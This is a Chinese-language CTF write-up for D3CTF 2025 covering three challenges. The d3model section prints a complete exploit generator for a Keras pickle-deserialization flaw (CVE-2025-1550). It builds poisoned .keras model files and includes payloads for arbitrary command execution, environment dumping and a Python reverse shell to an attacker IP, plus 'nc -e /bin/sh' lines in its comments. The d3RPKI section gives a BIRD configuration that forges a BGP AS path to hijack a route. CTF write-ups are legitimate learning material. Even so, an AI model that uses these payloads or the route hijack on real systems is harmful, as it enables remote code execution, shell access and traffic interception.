文章

D3CTF 2025 wp

前言

队伍里出了点小事情,具体请看下方链接

关于MNGA在D3CTF 2025被禁赛的情况说明

d3model

打CVE-2025-1550,应该是pickle反序列化

相关文章

《Inside CVE-2025-1550:通过 Keras 模型进行远程代码执行》 --- Inside CVE-2025-1550: Remote Code Execution via Keras Models

由于题目不出网,可以写进index.html来回显

最终exp如下(来自Q7师傅)

#!/usr/bin/env python3
"""
Utility functions for Keras NPZ pickle exploitation
"""

import pickle
import os
import subprocess
from keras.src.saving import saving_lib

class PayloadGenerator:
    """Collection of common CTF payloads for pickle deserialization"""
    
    @staticmethod
    def command_execution(command):
        """Execute arbitrary shell command"""
        class CommandExecution:
            def __reduce__(self):
                return (os.system, (command,))
        return CommandExecution()
    
    @staticmethod
    def reverse_shell(ip, port):
        """Create a reverse shell payload"""
        class ReverseShell:
            def __reduce__(self):
                command = f"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\"{ip}\\",{port}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\\"/bin/sh\\",\\"-i\\"]);'"
                return (os.system, (command,))
        return ReverseShell()
    
    @staticmethod
    def file_read(file_path, output_path="/tmp/flag_output"):
        """Read a file and save output"""
        class FileRead:
            def __reduce__(self):
                command = f"cat {file_path} > {output_path}"
                return (os.system, (command,))
        return FileRead()
    
    @staticmethod
    def file_write(content, file_path):
        """Write content to a file"""
        class FileWrite:
            def __reduce__(self):
                command = f"echo '{content}' > {file_path}"
                return (os.system, (command,))
        return FileWrite()
    
    @staticmethod
    def environment_dump(output_path="/tmp/env_dump"):
        """Dump environment variables"""
        class EnvDump:
            def __reduce__(self):
                command = f"env > {output_path}"
                return (os.system, (command,))
        return EnvDump()
    
    @staticmethod
    def directory_listing(directory="/", output_path="/tmp/dir_listing"):
        """List directory contents"""
        class DirList:
            def __reduce__(self):
                command = f"ls -la {directory} > {output_path}"
                return (os.system, (command,))
        return DirList()
    
    @staticmethod
    def python_code_execution(code):
        """Execute arbitrary Python code"""
        class PythonExec:
            def __reduce__(self):
                return (exec, (code,))
        return PythonExec()

def create_custom_payload():
    """Interactive payload creator"""
    print("=== Custom Payload Generator ===")
    print("Select payload type:")
    print("1. Command execution")
    print("2. Reverse shell")
    print("3. File read")
    print("4. File write")
    print("5. Environment dump")
    print("6. Directory listing")
    print("7. Python code execution")
    
    choice = input("Enter choice (1-7): ").strip()
    
    if choice == "1":
        command = input("Enter command to execute: ")
        return PayloadGenerator.command_execution(command)
    
    elif choice == "2":
        ip = input("Enter attacker IP: ")
        port = int(input("Enter port: "))
        return PayloadGenerator.reverse_shell(ip, port)
    
    elif choice == "3":
        file_path = input("Enter file path to read: ")
        output_path = input("Enter output path (default: /tmp/flag_output): ") or "/tmp/flag_output"
        return PayloadGenerator.file_read(file_path, output_path)
    
    elif choice == "4":
        content = input("Enter content to write: ")
        file_path = input("Enter output file path: ")
        return PayloadGenerator.file_write(content, file_path)
    
    elif choice == "5":
        output_path = input("Enter output path (default: /tmp/env_dump): ") or "/tmp/env_dump"
        return PayloadGenerator.environment_dump(output_path)
    
    elif choice == "6":
        directory = input("Enter directory to list (default: /): ") or "/"
        output_path = input("Enter output path (default: /tmp/dir_listing): ") or "/tmp/dir_listing"
        return PayloadGenerator.directory_listing(directory, output_path)
    
    elif choice == "7":
        code = input("Enter Python code to execute: ")
        return PayloadGenerator.python_code_execution(code)
    
    else:
        print("Invalid choice")
        return None

def test_payload_locally(payload):
    """Test a payload locally (BE CAREFUL!)"""
    print("\\n[WARNING] This will execute the payload locally!")
    print("Make sure you understand what it does before proceeding.")
    
    response = input("Continue with local test? (y/N): ")
    if response.lower() != 'y':
        print("Test cancelled.")
        return
    
    try:
        # Serialize and deserialize the payload
        pickled = pickle.dumps(payload)
        print("[+] Payload serialized successfully")
        
        print("[+] Executing payload...")
        unpickled = pickle.loads(pickled)
        print("[+] Payload executed!")
        
    except Exception as e:
        print(f"[!] Error: {e}")

def analyze_keras_file(filename):
    """Analyze a .keras file structure"""
    import zipfile
    
    try:
        with zipfile.ZipFile(filename, 'r') as zf:
            print(f"\\n=== Analysis of {filename} ===")
            print("Files in archive:")
            for info in zf.infolist():
                print(f"  {info.filename} ({info.file_size} bytes)")
                
                if info.filename.endswith('.npz'):
                    print(f"    -> NPZ file detected (target for injection)")
                elif info.filename.endswith('.json'):
                    print(f"    -> Configuration file")
    
    except Exception as e:
        print(f"Error analyzing file: {e}")

def create_custom_exploit():
    """Create a custom exploit with user-defined payload"""
    from refined_exploit import create_base_keras_model
    import zipfile
    import tempfile
    import numpy as np
    
    print("=== Custom Exploit Creator ===")
    
    # Get custom payload
    payload = create_custom_payload()
    if not payload:
        return
    
    # Create base model
    print("\\n[+] Creating base Keras model...")
    model = create_base_keras_model()
    
    # Save with NPZ
    temp_path = 'custom_temp.keras'
    # model.save(temp_path, weights_format='npz')
    saving_lib.save_model(model, temp_path, weights_format='npz')
    
    # Create malicious NPZ
    print("[+] Creating malicious NPZ with custom payload...")
    with tempfile.NamedTemporaryFile(suffix='.npz', delete=False) as f:
        # np.savez(f.name, 
        #         normal_data=np.array([1, 2, 3]),
        #         malicious_payload=payload)
        np.savez(f.name, __root__=payload)
        
        with open(f.name, 'rb') as npz_file:
            malicious_npz = npz_file.read()
    
    # Replace NPZ in keras file
    output_file = 'custom_exploit.keras'
    with zipfile.ZipFile(temp_path, 'r') as original:
        with zipfile.ZipFile(output_file, 'w') as new_zip:
            for item in original.infolist():
                if item.filename.endswith('.npz'):
                    new_zip.writestr(item.filename, malicious_npz)
                else:
                    new_zip.writestr(item.filename, original.read(item.filename))
    
    # Cleanup
    os.remove(temp_path)
    os.unlink(f.name)
    
    print(f"[+] Custom exploit created: {output_file}")
    
    # Test option
    test_choice = input("\\nTest payload locally? (y/N): ")
    if test_choice.lower() == 'y':
        test_payload_locally(payload)

if __name__ == "__main__":
    print("=== Keras NPZ Exploit Utilities ===")
    print("1. Create custom exploit")
    print("2. Test payload locally")
    print("3. Analyze .keras file")
    print("4. Generate common payloads")
    
    choice = input("\\nSelect option (1-4): ").strip()
    
    if choice == "1":
        create_custom_exploit()
    
    elif choice == "2":
        payload = create_custom_payload()
        if payload:
            test_payload_locally(payload)
    
    elif choice == "3":
        filename = input("Enter .keras file path: ")
        analyze_keras_file(filename)
    
    elif choice == "4":
        print("\\n=== Common CTF Payloads ===")
        print("Command execution:", PayloadGenerator.command_execution("whoami"))
        print("File read:", PayloadGenerator.file_read("/etc/passwd"))
        print("Environment dump:", PayloadGenerator.environment_dump())
        print("Directory listing:", PayloadGenerator.directory_listing("/"))
    
    else:
        print("Invalid choice") 
#!/usr/bin/env python3
import keras
import tensorflow as tf
import numpy as np
import pickle
import zipfile
import io
import os
import tempfile

def create_malicious_payload():
    """Create a malicious pickle payload"""
    
    class RCE:
        def __reduce__(self):
            import os
            # Modify this command for your specific CTF needs
            # Example payloads:
            # For file creation: "touch /tmp/exploited"
            # For reverse shell: "nc -e /bin/sh attacker_ip port"
            # For flag reading: "cat /flag > /tmp/flag_output"
            cmd = "echo 'RCE via Keras NPZ pickle exploit' > /tmp/keras_pwned"
            return (os.system, (cmd,))
    
    return RCE()

def create_poisoned_npz_data():
    """Create NPZ data with embedded pickle payload"""
    
    # Create legitimate weight arrays
    weights = {
        'dense_kernel': np.random.random((4, 10)).astype(np.float32),
        'dense_bias': np.random.random((10,)).astype(np.float32),
        'dense_1_kernel': np.random.random((10, 1)).astype(np.float32),
        'dense_1_bias': np.random.random((1,)).astype(np.float32)
    }
    
    # Create the malicious payload
    payload = create_malicious_payload()
    
    # Create a buffer for our NPZ file
    buffer = io.BytesIO()
    
    # This is the key: we'll create an NPZ file where one of the arrays
    # contains our pickle payload instead of legitimate numpy data
    with zipfile.ZipFile(buffer, 'w', zipfile.ZIP_DEFLATED) as zf:
        
        # Add legitimate weight arrays
        for name, array in weights.items():
            array_buffer = io.BytesIO()
            np.save(array_buffer, array)
            array_buffer.seek(0)
            zf.writestr(f'{name}.npy', array_buffer.getvalue())
        
        # Add our malicious pickle payload as a fake numpy array
        # When numpy.load tries to load this, it will unpickle our payload
        pickled_data = pickle.dumps(payload)
        
        # Create a fake .npy file header followed by our pickle data
        fake_npy_buffer = io.BytesIO()
        
        # NPY file format: magic string + version + header + data
        # We'll create a minimal valid header that will cause numpy to 
        # process our pickle data
        magic = b'\\x93NUMPY'
        version = b'\\x01\\x00'  # version 1.0
        
        # Create a header that describes our pickle data as an object array
        import struct
        header_dict = {
            'descr': '|O',  # object dtype - this allows pickle data
            'fortran_order': False,
            'shape': ()  # scalar
        }
        header_str = str(header_dict).replace("'", '"').replace('False', 'false')
        header_bytes = header_str.encode('latin1')
        
        # Pad header to 64 bytes boundary
        header_len = len(header_bytes)
        pad_len = (64 - (len(magic) + len(version) + 2 + header_len)) % 64
        header_bytes += b' ' * pad_len
        
        # Write the NPY header
        fake_npy_buffer.write(magic)
        fake_npy_buffer.write(version)
        fake_npy_buffer.write(struct.pack('<H', len(header_bytes)))
        fake_npy_buffer.write(header_bytes)
        
        # Write our pickle payload as the data
        fake_npy_buffer.write(pickled_data)
        
        # Add this as a weight file
        zf.writestr('malicious_weight.npy', fake_npy_buffer.getvalue())
    
    buffer.seek(0)
    return buffer.getvalue()

def create_base_keras_model():
    """Create a legitimate Keras model"""
    model = keras.Sequential([
        keras.layers.Dense(10, activation='relu', input_shape=(4,), name='dense'),
        # keras.layers.Dense(1, activation='sigmoid', name='dense_1')
    ])
    
    # model.compile(optimizer='adam', loss='binary_crossentropy')
    
    # Initialize with dummy data
    # X = np.random.random((10, 4))
    # y = np.random.randint(2, size=(10, 1))
    # model.fit(X, y, epochs=1, verbose=0)
    
    return model

def create_malicious_keras_model():
    """Create the main exploit"""
    
    print("[+] Creating base Keras model...")
    model = create_base_keras_model()
    
    print("[+] Saving model with NPZ weights...")
    temp_model_path = 'temp_model.keras'
    model.save(temp_model_path, save_format='keras', weights_format='npz')
    
    print("[+] Creating malicious NPZ payload...")
    malicious_npz = create_poisoned_npz_data()
    
    print("[+] Injecting malicious NPZ into .keras file...")
    
    # Read the original .keras file and modify it
    with zipfile.ZipFile(temp_model_path, 'r') as original:
        file_list = original.namelist()
        
        # Create the malicious model
        with zipfile.ZipFile('malicious_model.keras', 'w', zipfile.ZIP_DEFLATED) as malicious:
            
            for filename in file_list:
                if filename.endswith('model.weights.npz'):
                    # Replace the weights file with our malicious one
                    print(f"[+] Replacing {filename} with malicious NPZ")
                    malicious.writestr(filename, malicious_npz)
                else:
                    # Copy other files unchanged
                    content = original.read(filename)
                    malicious.writestr(filename, content)
    
    # Clean up
    os.remove(temp_model_path)
    
    print("[+] Malicious model created: malicious_model.keras")
    return 'malicious_model.keras'

def create_simple_exploit():
    """Alternative simpler approach - direct NPZ replacement"""
    
    print("[+] Creating simple exploit model...")
    
    # Create a minimal model
    model = keras.Sequential([keras.layers.Dense(1, input_shape=(1,))])
    model.compile(optimizer='adam', loss='mse')
    
    # Save with NPZ format
    model.save('simple_model.keras', weights_format='npz')
    
    # Create malicious NPZ with pickle payload
    payload = create_malicious_payload()
    
    # Create a simple NPZ file with our payload
    with tempfile.NamedTemporaryFile(suffix='.npz', delete=False) as f:
        # Save some dummy data and our payload
        np.savez(f.name, 
                legitimate_data=np.array([1, 2, 3]),
                malicious_object=payload)  # This will be pickled
        
        with open(f.name, 'rb') as npz_file:
            malicious_npz_data = npz_file.read()
    
    # Replace the NPZ in the keras file
    with zipfile.ZipFile('simple_model.keras', 'r') as original:
        with zipfile.ZipFile('simple_exploit.keras', 'w') as new_zip:
            for item in original.infolist():
                if item.filename.endswith('.npz'):
                    new_zip.writestr(item.filename, malicious_npz_data)
                else:
                    new_zip.writestr(item.filename, original.read(item.filename))
    
    os.remove('simple_model.keras')
    os.unlink(f.name)
    
    print("[+] Simple exploit created: simple_exploit.keras")
    return 'simple_exploit.keras'

def main():
    print("=== Keras NPZ Pickle Deserialization Exploit Generator ===")
    print()
    print("This script creates malicious Keras models that exploit pickle")
    print("deserialization vulnerabilities in the NPZ weight loading process.")
    print()
    
    print("Creating exploits...")
    
    # Create the main exploit
    exploit1 = create_malicious_keras_model()
    
    # Create the simple exploit
    exploit2 = create_simple_exploit()
    
    print("\\n" + "="*60)
    print("EXPLOIT FILES CREATED:")
    print(f"1. {exploit1} - Advanced NPZ injection")
    print(f"2. {exploit2} - Simple NPZ replacement")
    print()
    print("USAGE:")
    print("1. Upload either file to the target Flask application")
    print("2. The exploit triggers when keras.models.load_model() is called")
    print("3. Current payload: Creates /tmp/keras_pwned file")
    print()
    print("CUSTOMIZATION:")
    print("- Modify create_malicious_payload() for custom commands")
    print("- Common CTF payloads:")
    print("  * File read: 'cat /flag > /tmp/flag'")
    print("  * Reverse shell: 'nc -e /bin/sh IP PORT'")
    print("  * Command execution: Any shell command")
    print()
    print("WARNING: These files contain malicious code!")

if __name__ == "__main__":
    main() 

选择7 Python code execution,然后输入import os;os.system(”env > index.html”)生成keras并上传,最后刷新网页即可拿到flag

d3RPKI

  • t1(AS4211110001):运行 RPKI 服务器,连接多个网络,包括 nw0(10.0.0.1)。

  • t2-1(AS4211110002):控制的节点,连接 nw0(10.0.0.2)和外部网络,运行 BIRD 协议,开放 SSH。

  • t2-2(AS4211110003):定期向 10.4.0.5:1234 发送 FLAG。

  • t2-3(AS4211110004):连接 nw2 和 subnet4(10.4.0.1)。

protocol static {
    ipv4 {
        table BGP_table;
        import all;
        export none;
    };
    route 10.4.0.5/32 reject;
}

在 t2-1 的路由表中注入一个静态路由 10.4.0.5/32,状态为 reject

虽然路由被标记为不可达,但它会被注入到 BGP_table 中,并通过 BGP 协议向外宣布

template bgp BGP_peers {
    ipv4 {
        table BGP_table;
        export filter {
            if net = 10.4.0.5/32 then {
                bgp_path.empty;
                bgp_path.prepend(4211110004);
                accept;
            }
            if source ~ [RTS_STATIC, RTS_BGP] then accept;
            reject;
        };
    };
}

protocol bgp t1 from BGP_peers {
    local 10.0.0.2 as 4211110002;
    neighbor 10.0.0.1 as 4211110001;
}

t2-1 向 t1 宣布 10.4.0.5/32 的路由时,AS 路径被伪造成 [4211110004],像是从 AS4211110004(t2-3)发起的

t1 验证后接受此路由,并将其传播给网络中的其他节点,t2-2 更新其路由表,认为 10.4.0.5 可以通过 t1 到达,最终流量会到达t2-1

将 10.4.0.5 的 IP 地址绑定到 t2-1 的接口,并监听 1234 端口,即可拿到flag

完整解法如下:

首先修改/etc/bird/bird.conf

log syslog all;
debug protocols all;

router id 10.2.0.1;

ipv4 table BGP_table;

protocol device {
}

protocol kernel {
    scan time 10;
    ipv4 {
        export all;
        import none;
    };
}

protocol static {
    ipv4 {
        table BGP_table;
        import all;
        export none;
    };
    route 10.2.0.0/24 reject;
    route 10.4.0.5/32 reject;
}

roa4 table r4;

protocol rpki {
    debug all;
    roa4 { table r4; };
    remote "10.0.0.1" port 8083;
    retry keep 5;
    refresh keep 30;
    expire 600;
}

template bgp BGP_peers {
    ipv4 {
        table BGP_table;
        import filter {
            if roa_check(r4, net, bgp_path.last) !~ [ROA_VALID] then {
                print "ROA check failed for ", net, " ASN ", bgp_path.last;
                reject;
            }
            accept;
        };
        export filter {
            if net = 10.4.0.5/32 then {
                bgp_path.empty;
                bgp_path.prepend(4211110004);
                accept;
            }
            if source ~ [RTS_STATIC, RTS_BGP] then accept;
            reject;
        };
    };
}

protocol pipe {
    table master4;
    peer table BGP_table;
    import filter {
        if source = RTS_STATIC then reject;
        krt_prefsrc = 10.2.0.1;
        accept;
    };
    export none;
}

protocol bgp t1 from BGP_peers {
    local 10.0.0.2 as 4211110002;
    neighbor 10.0.0.1 as 4211110001;
}

然后运行命令即可

Last login: Tue May 20 10:43:49 2025 from 100.64.5.2
root@b04002374330:~# service bird restart
 * Restarting BIRD Internet Routing Daemon bird                                  [ OK ] 
root@b04002374330:~# ip addr add 10.4.0.5/32 dev eth0
root@b04002374330:~# nc -l 10.4.0.5 1234
d3ctf{c9780467-2ff8-4ccf-96e1-49b36e3f6822}

D^3Rpg - Signin

一开始跟着解misc

后面发现钱数刷满128就会给flag

解码出来W3lc0m3_7o_d3_RpG_W0r1d

le0n师傅这次太强了

几乎把web方向给ak了

许可协议:  CC BY 4.0